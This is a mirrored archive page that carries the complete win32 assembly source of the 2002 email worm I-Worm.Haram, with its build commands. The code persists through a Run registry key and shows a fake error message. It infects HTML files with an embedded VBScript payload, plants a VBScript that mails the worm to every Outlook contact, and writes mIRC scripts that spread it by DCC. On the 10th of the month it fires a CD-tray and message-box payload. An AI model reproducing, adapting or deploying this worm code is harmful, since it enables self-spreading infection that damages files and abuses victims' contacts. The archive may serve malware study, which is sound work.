mirror of
https://github.com/vxunderground/MalwareSourceCode.git
synced 2025-01-12 13:25:30 +00:00
592 lines
12 KiB
NASM
592 lines
12 KiB
NASM
comment *
|
||
Name : I-Worm.Haram
|
||
Author : PetiK
|
||
|
||
Language : win32asm
|
||
Date : May 13th 2002 - June 1st 2002
|
||
|
||
Size : 5192 bytes (compressed with Petite Tool)
|
||
|
||
Comments : - Copy to %sysdir%\FunnyGame.exe
|
||
- Search all doc files in "Personal" folder and create a new virus html file:
|
||
|
||
example : document.doc -> document.htm
|
||
1) 2)
|
||
|
||
1) Good DOC file
|
||
2) Good HTM virus (1571 bytes)
|
||
|
||
- Put the name of all active process and add .htm:
|
||
|
||
example : process.exe -> process.exe.htm
|
||
3) 4)
|
||
|
||
3) Real name of active process
|
||
4) Real name of the HTM virus (in "C:\backup" folder for Win ME/2k/XP)
|
||
|
||
- Create a random name file in StarUp folder to spread with Outlook
|
||
|
||
- On the 10th, payload : open and close CD door and display a messagebox in loop
|
||
|
||
*
|
||
|
||
.586p
|
||
.model flat
|
||
.code
|
||
|
||
JUMPS
|
||
|
||
include win32api.inc
|
||
|
||
LF equ 10
|
||
CR equ 13
|
||
CRLF equ <13,10>
|
||
|
||
@pushsz macro msg2psh, empty
|
||
local next_instr
|
||
ifnb <empty>
|
||
%out too much arguments in macro '@pushsz'
|
||
.err
|
||
endif
|
||
call next_instr
|
||
db msg2psh,0
|
||
next_instr:
|
||
endm
|
||
|
||
@endsz macro
|
||
local nxtchr
|
||
nxtchr: lodsb
|
||
test al,al
|
||
jnz nxtchr
|
||
endm
|
||
|
||
api macro a
|
||
extrn a:proc
|
||
call a
|
||
endm
|
||
|
||
WIN32_FIND_DATA struct
|
||
dwFileAttributes dd 0
|
||
ftCreationTime dd ?,?
|
||
ftLastAccessTime dd ?,?
|
||
ftLastWriteTime dd ?,?
|
||
nFileSizeHigh dd 0
|
||
nFileSizeLow dd 0
|
||
dwReserved0 dd 0,0
|
||
cFileName db 260 dup(0)
|
||
cAlternateFileName db 14 dup(0)
|
||
db 2 dup (0)
|
||
WIN32_FIND_DATA ends
|
||
|
||
PROCESSENTRY32 STRUCT
|
||
dwSize DWORD ?
|
||
cntUsage DWORD ?
|
||
th32ProcessID DWORD ?
|
||
th32DefaultHeapID DWORD ?
|
||
th32ModuleID DWORD ?
|
||
cntThreads DWORD ?
|
||
th32ParentProcessID DWORD ?
|
||
pcPriClassBase DWORD ?
|
||
dwFlags DWORD ?
|
||
szExeFile db 260 dup(?)
|
||
PROCESSENTRY32 ENDS
|
||
|
||
start: pushad
|
||
@SEH_SetupFrame <jmp end_worm>
|
||
|
||
hide_the_worm:
|
||
call hide_worm
|
||
|
||
get_name:
|
||
push 50
|
||
mov esi,offset orgwrm
|
||
push esi
|
||
push 0
|
||
api GetModuleFileNameA
|
||
|
||
get_copy_name:
|
||
mov edi,offset cpywrm
|
||
push edi
|
||
push 50
|
||
push edi
|
||
api GetSystemDirectoryA
|
||
add edi,eax
|
||
mov eax,'nuF\'
|
||
stosd
|
||
mov eax,'aGyn'
|
||
stosd
|
||
mov eax,'e.em'
|
||
stosd
|
||
mov eax,'ex'
|
||
stosd
|
||
pop edi
|
||
|
||
copy_worm:
|
||
push 1
|
||
push edi
|
||
push esi
|
||
api CopyFileA
|
||
test eax,eax
|
||
je ok_copy
|
||
|
||
push 50
|
||
push edi
|
||
push 1
|
||
@pushsz "Haram"
|
||
@pushsz "Software\Microsoft\Windows\CurrentVersion\Run"
|
||
push 80000002h
|
||
api SHSetValueA
|
||
|
||
push 50
|
||
push offset msgwrm
|
||
push esi
|
||
api GetFileTitleA
|
||
push 10h
|
||
push offset msgwrm
|
||
@pushsz "ERROR : this file is not a valid Win32 file."
|
||
push 0
|
||
api MessageBoxA
|
||
ok_copy:
|
||
|
||
call inf_doc_personal
|
||
|
||
get_startup_path:
|
||
push 0
|
||
push 7
|
||
push offset startup
|
||
push 0
|
||
api SHGetSpecialFolderPathA
|
||
push offset startup
|
||
api SetCurrentDirectoryA
|
||
|
||
call cr_vbsname
|
||
|
||
mov edi,offset vbsname
|
||
|
||
push 0
|
||
push 1
|
||
push 2
|
||
push 0
|
||
push 1
|
||
push 40000000h
|
||
push edi
|
||
api CreateFileA
|
||
mov ebp,eax
|
||
push 0
|
||
push offset byte_write
|
||
push e_vbs - s_vbs
|
||
push offset s_vbs
|
||
push ebp
|
||
api WriteFile
|
||
push ebp
|
||
api CloseHandle
|
||
|
||
|
||
payload:
|
||
mov eax,offset sysTime
|
||
push eax
|
||
api GetSystemTime
|
||
lea eax,sysTime
|
||
cmp word ptr [eax+6],10
|
||
jne end_payload
|
||
|
||
xor eax,eax
|
||
push eax
|
||
push eax
|
||
push eax
|
||
@pushsz "set CDAudio door open"
|
||
api mciSendStringA
|
||
|
||
push 500
|
||
api Sleep
|
||
|
||
xor eax,eax
|
||
push eax
|
||
push eax
|
||
push eax
|
||
@pushsz "set CDAudio door closed"
|
||
api mciSendStringA
|
||
|
||
push 40h
|
||
@pushsz "I-Worm.Haram"
|
||
@pushsz "Coded by PetiK - <20>2002 - France"
|
||
push 0
|
||
api MessageBoxA
|
||
|
||
api GetTickCount
|
||
push 10000
|
||
pop ecx
|
||
xor edx,edx
|
||
div ecx
|
||
inc edx
|
||
mov ecx,edx
|
||
push ecx
|
||
api Sleep
|
||
jmp payload
|
||
|
||
end_payload:
|
||
|
||
call inf_process
|
||
|
||
end_worm:
|
||
@SEH_RemoveFrame
|
||
popad
|
||
push 0
|
||
api ExitProcess
|
||
|
||
hide_worm Proc
|
||
pushad
|
||
@pushsz "KERNEL32.DLL"
|
||
api GetModuleHandleA
|
||
xchg eax,ecx
|
||
jecxz end_hide_worm
|
||
@pushsz "RegisterServiceProcess" ; Registered as Service Process
|
||
push ecx
|
||
api GetProcAddress
|
||
xchg eax,ecx
|
||
jecxz end_hide_worm
|
||
push 1
|
||
push 0
|
||
call ecx
|
||
end_hide_worm:
|
||
popad
|
||
ret
|
||
hide_worm EndP
|
||
|
||
Spread_Mirc Proc
|
||
push offset cpywrm
|
||
push offset mirc_exe
|
||
api lstrcpy
|
||
call @mirc
|
||
db "C:\mirc\script.ini",0
|
||
db "C:\mirc32\script.ini",0 ; spread with mIRC. Thanx to Microsoft.
|
||
db "C:\progra~1\mirc\script.ini",0
|
||
db "C:\progra~1\mirc32\script.ini",0
|
||
@mirc:
|
||
pop esi
|
||
push 4
|
||
pop ecx
|
||
mirc_loop:
|
||
push ecx
|
||
push 0
|
||
push 80h
|
||
push 2
|
||
push 0
|
||
push 1
|
||
push 40000000h
|
||
push esi
|
||
api CreateFileA
|
||
mov ebp,eax
|
||
push 0
|
||
push offset byte_write
|
||
@tmp_mirc:
|
||
push e_mirc - s_mirc
|
||
push offset s_mirc
|
||
push ebp
|
||
api WriteFile
|
||
push ebp
|
||
api CloseHandle
|
||
@endsz
|
||
pop ecx
|
||
loop mirc_loop
|
||
end_spread_mirc:
|
||
ret
|
||
Spread_Mirc EndP
|
||
|
||
|
||
|
||
inf_doc_personal Proc
|
||
pushad
|
||
get_personal_folder:
|
||
push 0
|
||
push 5
|
||
push offset personal
|
||
push 0
|
||
api SHGetSpecialFolderPathA
|
||
push offset personal
|
||
api SetCurrentDirectoryA
|
||
fff_doc:
|
||
push offset ffile
|
||
@pushsz "*.doc"
|
||
api FindFirstFileA
|
||
inc eax
|
||
je end_f_doc
|
||
dec eax
|
||
mov [hfind],eax
|
||
|
||
cr_file:
|
||
push offset ffile.cFileName
|
||
push offset new_file
|
||
api lstrcpy
|
||
mov esi,offset new_file
|
||
push esi
|
||
api lstrlen
|
||
add esi,eax
|
||
sub esi,4 ; to become \SYSTEM\Wsock32
|
||
mov [esi],"mth."
|
||
lodsd
|
||
|
||
push 0
|
||
push 1
|
||
push 2
|
||
push 0
|
||
push 1
|
||
push 40000000h
|
||
push offset new_file
|
||
api CreateFileA
|
||
mov ebp,eax
|
||
push 0
|
||
push offset byte_write
|
||
push e_htm - s_htm
|
||
push offset s_htm
|
||
push ebp
|
||
api WriteFile
|
||
push ebp
|
||
api CloseHandle
|
||
|
||
fnf_doc:
|
||
push offset ffile
|
||
push [hfind]
|
||
api FindNextFileA
|
||
test eax,eax
|
||
jne cr_file
|
||
push [hfind]
|
||
api FindClose
|
||
end_f_doc:
|
||
popad
|
||
ret
|
||
inf_doc_personal EndP
|
||
|
||
|
||
inf_process Proc
|
||
popad
|
||
create_folder:
|
||
push 0
|
||
@pushsz "C:\backup"
|
||
api CreateDirectoryA
|
||
@pushsz "C:\backup"
|
||
api SetCurrentDirectoryA
|
||
enum_process:
|
||
push 0
|
||
push 2
|
||
api CreateToolhelp32Snapshot
|
||
mov lSnapshot,eax
|
||
inc eax
|
||
je end_inf_process
|
||
lea eax,uProcess
|
||
mov [eax.dwSize], SIZE PROCESSENTRY32
|
||
lea eax,uProcess
|
||
push eax
|
||
push lSnapshot
|
||
api Process32First
|
||
check_process:
|
||
test eax,eax
|
||
jz end_process
|
||
push ecx
|
||
mov eax,ProcessID
|
||
push offset uProcess
|
||
cmp eax,[uProcess.th32ProcessID]
|
||
je NextProcess
|
||
lea ebx,[uProcess.szExeFile]
|
||
|
||
push ebx
|
||
push offset new_name
|
||
api lstrcpy
|
||
mov edi,offset new_name
|
||
push edi
|
||
api lstrlen
|
||
add edi,eax
|
||
mov eax,"mth."
|
||
stosd
|
||
xor eax,eax
|
||
stosd
|
||
push offset new_name
|
||
@pushsz "System.htm"
|
||
api lstrcmp
|
||
test eax,eax
|
||
jz NextProcess
|
||
|
||
push 0
|
||
push 1
|
||
push 2
|
||
push 0
|
||
push 1
|
||
push 40000000h
|
||
push offset new_name
|
||
api CreateFileA
|
||
mov ebp,eax
|
||
push 0
|
||
push offset byte_write
|
||
push e_htm - s_htm
|
||
push offset s_htm
|
||
push ebp
|
||
api WriteFile
|
||
push ebp
|
||
api CloseHandle
|
||
|
||
NextProcess:
|
||
push offset uProcess
|
||
push lSnapshot
|
||
api Process32Next
|
||
jmp check_process
|
||
end_process:
|
||
push lSnapshot
|
||
api CloseHandle
|
||
end_inf_process:
|
||
pushad
|
||
ret
|
||
inf_process EndP
|
||
|
||
|
||
cr_vbsname Proc
|
||
mov edi,offset vbsname
|
||
; api GetTickCount
|
||
push 10
|
||
pop ecx
|
||
; xor edx,edx
|
||
; div ecx
|
||
; inc edx
|
||
; mov ecx,edx
|
||
name_g:
|
||
push ecx
|
||
api GetTickCount
|
||
push '9'-'0'
|
||
pop ecx
|
||
xor edx,edx
|
||
div ecx
|
||
xchg eax,edx
|
||
add al,'0'
|
||
stosb
|
||
api GetTickCount
|
||
push 100
|
||
pop ecx
|
||
xor edx,edx
|
||
div ecx
|
||
push edx
|
||
api Sleep
|
||
pop ecx
|
||
loop name_g
|
||
mov eax,"sbv."
|
||
stosd
|
||
ret
|
||
cr_vbsname EndP
|
||
|
||
|
||
|
||
.data
|
||
ffile WIN32_FIND_DATA <?>
|
||
sysTime db 16 dup(0)
|
||
|
||
uProcess PROCESSENTRY32 <?>
|
||
ProcessID dd ?
|
||
lSnapshot dd ?
|
||
new_name db 100 dup (?)
|
||
|
||
orgwrm db 50 dup (0)
|
||
cpywrm db 50 dup (0)
|
||
msgwrm db 50 dup (0)
|
||
startup db 70 dup (0)
|
||
personal db 70 dup (0)
|
||
new_file db 90 dup (0)
|
||
vbsname db 20 dup (0)
|
||
byte_write dd ?
|
||
hfind dd ?
|
||
|
||
s_mirc: db "[script]",CRLF
|
||
db ";Don't edit this file.",CRLF,CRLF
|
||
db "n0=on 1:JOIN:{",CRLF
|
||
db "n1= /if ( $nick == $me ) { halt }",CRLF
|
||
db "n2= /.dcc send $nick "
|
||
mirc_exe db 50 dup (?)
|
||
db CRLF,"n3=}",0
|
||
e_mirc:
|
||
|
||
|
||
s_htm: db '<haram>',CRLF
|
||
db '<html><head><title>Windows Media Player</title></head><body>',CRLF
|
||
db '<script language=VBScript>',CRLF
|
||
db 'On Error Resume Next',CRLF
|
||
db 'MsgBox "Please accept the ActiveX",vbinformation,"Internet Explorer"',CRLF
|
||
db 'Set upfkupfk=CreateObject("Scripting.FileSystemObject")',CRLF
|
||
db 'Set kupfkvqg=CreateObject("WScript.Shell")',CRLF
|
||
db 'If err.number=429 Then',CRLF
|
||
db 'kupfkvqg.Run javascript:location.reload()',CRLF
|
||
db 'Else',CRLF,CRLF
|
||
db 'glvqglvb(upfkupfk.GetSpecialFolder(0))',CRLF
|
||
db 'glvqglvb(upfkupfk.GetSpecialFolder(1))',CRLF
|
||
db 'glvqglvb(kupfkvqg.SpecialFolders("MyDocuments"))',CRLF
|
||
db 'glvqglvb(kupfkvqg.SpecialFolders("Desktop"))',CRLF
|
||
db 'glvqglvb(kupfkvqg.SpecialFolders("Favorites"))',CRLF
|
||
db 'glvqglvb(kupfkvqg.SpecialFolders("Fonts"))',CRLF
|
||
db 'End If',CRLF,CRLF
|
||
db 'Function glvqglvb(dir)',CRLF
|
||
db 'If upfkupfk.FolderExists(dir) Then',CRLF
|
||
db ' Set bbbbbbbb=upfkupfk.GetFolder(dir)',CRLF
|
||
db ' Set bbblvqgl=bbbbbbbb.Files',CRLF
|
||
db ' For each lvqgvqgl in bbblvqgl',CRLF
|
||
db ' lvqglvqr=lcase(upfkupfk.GetExtensionName(lvqgvqgl.Name))',CRLF
|
||
db ' If lvqglvqr="htm" or lvqglvqr="html" Then',CRLF
|
||
db ' Set rhmwrrhm=upfkupfk.OpenTextFile(lvqgvqgl.path,1 ,False)',CRLF
|
||
db ' if rhmwrrhm.ReadLine <> "<haram>" Then',CRLF
|
||
db ' rhmwrrhm.Close()',CRLF
|
||
db ' Set rhmwrrhm=upfkupfk.OpenTextFile(lvqgvqgl.path,1 ,False)',CRLF
|
||
db ' htmorg=rhmwrrhm.ReadAll()',CRLF
|
||
db ' rhmwrrhm.Close()',CRLF
|
||
db ' Set mwrrhmwr=document.body.createTextRange',CRLF
|
||
db ' Set rhmwrrhm=upfkupfk.CreateTextFile(lvqgvqgl.path, True, False)',CRLF
|
||
db ' rhmwrrhm.WriteLine "<haram>"',CRLF
|
||
db ' rhmwrrhm.Write(htmorg)',CRLF
|
||
db ' rhmwrrhm.WriteLine mwrrhmwr.htmltext',CRLF
|
||
db ' rhmwrrhm.Close()',CRLF
|
||
db ' Else',CRLF
|
||
db ' rhmwrrhm.Close()',CRLF
|
||
db ' End If',CRLF
|
||
db ' End If',CRLF
|
||
db ' Next',CRLF
|
||
db 'End If',CRLF
|
||
db 'End Function',CRLF
|
||
db '</script></body></html>',0
|
||
e_htm:
|
||
|
||
s_vbs: db 'On Error Resume Next',CRLF
|
||
db 'Set terqne = CreateObject("Scripting.FileSystemObject")',CRLF
|
||
db 'Set qumhzh = CreateObject("WScript.Shell")',CRLF
|
||
db 'Set sys = terqne.GetSpecialFolder(1)',CRLF
|
||
db 'copyname = sys&"\FunnyGame.exe"',CRLF
|
||
db 'Set htgx = CreateObject("Outlook.Application")',CRLF
|
||
db 'Set ofcc = htgx.GetNameSpace("MAPI")',CRLF
|
||
db 'For each c In ofcc.AddressLists',CRLF
|
||
db 'If c.AddressEntries.Count <> 0 Then',CRLF
|
||
db 'For d = 1 To c.AddressEntries.Count',CRLF
|
||
db 'Set etldb = htgx.CreateItem(0)',CRLF
|
||
db 'etldb.To = c.AddressEntries(d).Address',CRLF
|
||
db 'etldb.Subject = "New game from the net for you " & c.AddressEntries(d).Name',CRLF
|
||
db 'etldb.Body = "Play at this funny game. It''s very cool !"',CRLF
|
||
db 'etldb.Attachments.Add(copyname)',CRLF
|
||
db 'etldb.DeleteAfterSubmit = True',CRLF
|
||
db 'If etldb.To <> "" Then',CRLF
|
||
db 'etldb.Send',CRLF
|
||
db 'End If',CRLF
|
||
db 'Next',CRLF
|
||
db 'End If',CRLF
|
||
db 'Next',0
|
||
e_vbs:
|
||
|
||
ends
|
||
end start
|
||
|
||
*************************************************************************
|
||
|
||
@tasm32 /M /ML haram.asm
|
||
@tlink32 -Tpe -aa -c -x haram.obj,,,import32,haram.def
|
||
rem pause
|
||
rem upx -9 haram.exe
|
||
@del *.obj
|
||
rem pause
|
||
|
||
*************************************************************************
|
||
|
||
IMPORTS
|
||
|
||
SHLWAPI.SHSetValueA
|
||
SHELL32.SHGetSpecialFolderPathA |